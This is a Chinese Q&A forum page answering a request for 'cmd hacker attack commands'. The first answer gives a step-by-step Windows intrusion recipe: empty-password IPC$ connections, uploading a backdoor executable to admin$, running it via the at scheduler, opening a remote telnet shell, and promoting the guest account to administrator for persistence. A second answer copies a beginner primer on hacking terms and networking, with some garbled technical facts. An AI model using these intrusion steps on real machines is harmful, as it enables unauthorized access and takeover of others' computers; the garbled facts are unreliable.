跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有
发布网友
发布时间:2022-04-26 23:56
共3个回答
热心网友
时间:2022-04-19 03:21
建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
删除一个ipc$连接
net use \\IP\ipc$ /del
删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.
二 经典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).
ipc$经典入侵步骤:
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡
常用的网络命令
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享
net stop lanmanserver 关闭ipc$和默认共享依赖的服务
net use 查看IPC$连接情况
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
net use \\ip\ipc$ /del 删除一个连接
net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
net use z: /del
net time \\ip 查看远程计算机上的时间
copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
at 查看自己计算机上的计划作业
at \\ip 查看远程计算机上的计划作业
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
at \\ip all /delete 删除远程计算机上的全部计划作业
at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt;
下面纯手打,上面是度娘给的
taskkill /im 进程名 停止运行
tasklisy 查看运行进程
ipconfig 查看本机IP
md 创建文件夹
rd 删除文件夹
echo off > .txt|exit 添加文本
echo 内容 >> .txt 给文本添加内容
copy 复制文件
net user 用户名 密码/add 创建一个普通账号
net localgroup administrators 用户名 /add 把账户加入超级用户组
热心网友
时间:2022-04-19 04:39
https://ke.baidu.com/item/DOS%E5%91%BD%E4%BB%A4/5143255?fr=aladdin
一:
黑客:
1)要有英语基础,:这是基础,每天要注意*。
2)知道常用的黑客术语,
3.)网络安全术语,如tcp/ip协议,APR协议
4.)熟练掌握DOS命令和黑客工具,ping,netstat,net命令等,工具有远程入侵,
5.)主流的编程语言以及脚本。
(1.网页脚本,即网页代码,例如HTML,CSS,JAVAscript,asp,php,xml等
(2.解释型语言,即perl,python,REBOL,Ruby等,也称为脚本语言,用于和底层的操作系统沟通,效果是效率差,源代码外露,一般用于网页服务器中,不用来开发
软件产品。
(3.混合型语言,Java和c#,处于解释型和编译型之间。
(4.编译型语言,Java,c/c++。
(5.汇编语言,即最接近于硬件的语言,但是用这个语言的人少。
程序语言学习的顺序建议如下:
Javascrip->解释型语言->混和型语言->编译型语言->汇编语言。
书上这样给的。但是根据我们学习的安排进程,应该是
c语言->c++->网页脚本语言->解释型语言->混合型语言->编译型语言->汇编语言
肉鸡:任黑客宰割的计算机。
木马:表面上伪装成正常的程序,一旦运行,入侵者就会获取系统的整个控制权限。
网页木马:表面上伪装成普通的网页文件,或者将正常的网页文件插进去恶意代码,一旦访问这些网络文件,网页木马就会利用对方的系统或者浏览器存在的漏洞自动将木马的服务器端配置好然后下载到访问者的计算机上自动执行。
挂马:这个是在别人的网站文件里放网页木马,或者将代码潜入到对方的正常网页文件里,使得浏览器中马。
后门:当黑客控制了目标主机后,还可以在对方系统植入特定程序,或者修改某些设置。并且这些变化是从表面上很难被察觉。黑客可以使用相应的程序或者方法与该计算机建立连接,重新控制这台计算机。所谓后门便是小偷配置了主人家的钥匙。随时随地就可以进出主人房间不被发现。
IPC$
共享“命名管道”资源,即为了让进程之间通信而开放的命名管道,可以通过验证用户名和密码获着相应权限,在远程管理计算机和查看计算机的共享资源时使用。,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
不过要注意一点:建立 IPC$ 连接的操作会在 Event Log 中留下记录,不管你是否登录成功
https://ke.baidu.com/item/%E7%A9%BA%E8%BF%9E%E6%8E%A5/1993355?fr=aladdin&fromid=9482475&fromtitle=ipc%24
shell 命令执行环境。
webshell
是以ASP,PHP,JSP或者CGI等网页文件形式存在的一种命令执行环境,即一种网页后门。
“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
溢出:大致分为两种,1.堆溢出2.栈溢出。
溢出即是缓冲区溢出,即程序对接收的输入数据没有执行有效的检测而导致错误。后是程序崩溃,或者执行攻击者的任务。
缓冲区溢出漏洞主要是由于许多软件没有对缓冲区进行检查而造成。
具体溢出就看看下面链接吧。
https://ke.baidu.com/item/%E6%BA%A2%E5%87%BA/1775951?fr=aladdin
1.ip:互联网中,利用IP地址,可以找到目标主机。想要攻击某互联网主机,就先确定目标主机的域名或者IP地址。
IP即是主机编址方式,每个IP地址长32bit,每一个bit是4个字节。IP的表示方法是'点分十进制表示法'
ip信息包括 IP地址,子网掩码,默认网关和DNS。此4个只有协同合作,用户便可以访问互联网并被互联网中的计算机所访问(采用静态IP地址接入互联网时,ISP(服务商)为用户提供全部的IP信息)。
企业网络使用的IP地址,由提供互联网的服务商ISP分配。
私有的IP地址则由网络管理员自由分配。但是是网络内部所有计算机的IP地址不能相同,否则。发生IP地址冲突,导致网络连接失败。
子网掩码是与IP地址相结合的使用的一种技术,作用有两种,1.确定地址的网络号和主机号。2.用于将一个大的IP网络划分为若干个小子网络。
默认网关:是指一台主机找到可用的网关,就把数据包发送给默认指定的网关。由一个网关向另一个网关发送信息时,也必须经过一道关口,这道关口就是网关。
DNS:DNS服务用于将用户的域名请求转换为IP地址。若企业网络没有提供DNS服务,则DNS服务器的IP地址应是ISP的DNS服务器。如果企业网络自己提供的dns服务,则dns服务器的IP地址就是内部DNS服务器的IP地址.
IP 地址的分类
互联网中的每个接口都有唯一的IP地址与其对应,该地址也是有一定结构。以下是IP的https://ke.baidu.com/item/IP%E5%9C%B0%E5%9D%80/150859
A类的IP地址由一个字节的网络地址和3个字节的主机地址组成。网络地址的最高位必须是0,可用A类网络有126个,每个网络能容纳1亿多个主机地址范围1.0.0.1~126.255.255.254.
B类IP地址:2个字节的网络地址和两个字节的主机地址组成,网络地址的最高位必须是10,可用的网络有16382个,每个网络能容纳6万多个主机,地址范围有128.0.0.1~191.255.255.254.
C类的IP地址:由3个字节的网络地址和1个字节的主机地址。组成网络地址最高位是110,可用的网络达209万,每个网络能容纳254个主机,地址范围是192.0.0.1~223.255.255.254
D类的地址
用于多点广播,第一个字节以1110开始,它是一个专门保留的地址,并不指向特定的网络。多点广播地址用来一次寻址一组计算机,他标识共享同一协议的一组计算机,地址范围为224.0.0.1~239.255.255.254
E类的IP地址
以11110开始,为了将来使用而保留。
全零(0.0.0.0)地址对应于当前主机;全1的IP地址(255.255.255.255)是当前子网的广播地址,地址范围为240.0.0.1~255.255.255.254
注意 全零和全1的地址禁止使用,全零代表本网络,而全一是广播地址(在CISCO上可以使用全零地址)常用的是ABC这三类地址。
2.认识进程
所谓进程便是程序在计算机上的一次执行活动。开始运行一个程序时,就启动一个进程。进程还分为系统进程和用户进程。
凡是用于完成操作系统的各种功能的进程就是系统进程,且时处于运动状态下的操作系统本身;
用户进程就是所有用户启动的进程。进程是操作系统进行资源分配的单位。
3.端口
是计算机和外界通信交流的出口。
硬件领域的端口又称为接口,如USB端口,串行端口等。
软件领域端口一般指互联网中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和i/o(基本输入输出)缓冲区。
端口是传输层的内容,是面向连接的,对应网络上常见的一些服务,这些常见的服务可以划分为TCP端口(面向连接,如打电话)和使用UDP端口(无连接,如写信)两种。
4.虚拟机环境
黑客无论是在测试和学习黑客工具的操作方法还是在攻击时候,不会拿实体计算机来尝试,而是在计算机中搭建虚拟环境,即在自己已在的系统中,利用虚拟机创建一个内在的系统,该系统可以与外界独立,但与已经存在的系统建立网络关系,从而方便使用某些黑客工具进行攻击模拟,并且一旦黑客工具对虚拟机造成破坏,也会很快就会恢复,不会影响本来的计算机系统,使得操作更安全。
二:
1.window系统的命令行
服务器管理 和网络管理是系统和网络管理者的主要内容。
window系统本身 就带着一些病毒和受残损的文件,常使用户无法正常工作。但是熟练掌握命令行的使用方法,能保障计算机系统的安全性能。
2.Dos系统
dos是一组控制计算机 工作的程序,专门用来管理计算机中各种软件,硬件资源,负责监视和 控制计算机的全部工作过程。向用户提供了一整套使用 计算机系统的 命令和方法,还向用户提供了一套组织和应用磁盘上信息的方法。
dos的 功能:
执行命令和程序:当用户键入合法命令和文件名后,dos就根据文件的存储地址到内存 或外存上查找用户所需的程序,并根据用户的 要求使得CPU运行,否则则出现出错信息 ,告诉用户服务,在这里,cpu承担了使用者,计算机,应用程序三者之间的中间人。
内存管理:
分配内存空间,保护内存,使得任何一个程序所占的空间不遭到破坏,同硬件相配合,可以设置一个最佳的操作环境。
设备管理:
为用户提供使用各种输入或输出的设备(如键盘,磁盘,打印机,和显示器等)的操作方法。可以通过dos方便的实现内存和外存之间的数据传送和存取。
文件管理;
为用户提供一种简单的存取和管理信息方法。通过dos管理文件目录,为文件分配磁盘存储空间,建立,复制,删除,读/写和检索各类文件等。
作业管理:
作业是指用户提交给计算机系统的一个独立的计算任务,包括源程序,数据和相关命令。作业管理是对用户提交的诸多作业进行管理,包括作业的组织,控制和 调度等。
文件与目录:
文件是存储于外存储器中具有名字的一组相关信息集合,
在dos下的所有程序和数据都是以文件形式存入磁盘。自己编制的存入磁盘的程序就是文件。执行dos 外部的命令就调用此命令文件的过程。
内部命令隐藏在dos的io.sys和msdos.sys中,当dos启动计算机时候
使用者输入一个dos 命令时候,该指令先交由command.com分析,所以command被称为命令处理器,其功能就是判断使用者 所输入的指令是内部命令还是外部命令。若是内部,交给io.sys或msdos.sys处理,反之则到磁盘上找寻该档案,即执行该指令。
WiFi
WiFi实际上是一种高频无线电信号,它是 一种可将个人计算机。手机等终端以无线方式互相连接的技术。
无线网络在无线局域网上的范畴内是指“无线相容性认证".实质上是一种商业认证。也是无线联网技术。
以前通过网线连接计算机,而无线保真则是通过无线电波来联网。常见的就是用一个无线路由器,在这个无线路由器的电波覆盖的有效范围内就可以采用无线保真方式进行联网,若无线路由器连接了一条ADSL的线路或者别的上网线路,
电脑的无线路由器的参数设置。192.168.1.1
连接问题:手机连不上路由器,可能是手机连接该无线路由器的无线信号,并且在手机上保存了无线网络的配置文件,但是改变了无线路由器的加密方式或者密钥。手机不能自动连接到该信号,需要先删除原有的无线配置文件再重新连接。
若是手机无线显示已连接,但是不能上网,可能是手机的IP地址等参数配置错误。推荐使用默认的自动获取默认的IP地址。
作者:笑雅雅
链接:https://www.jianshu.com/p/e51947fe4241
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
热心网友
时间:2022-04-19 06:13
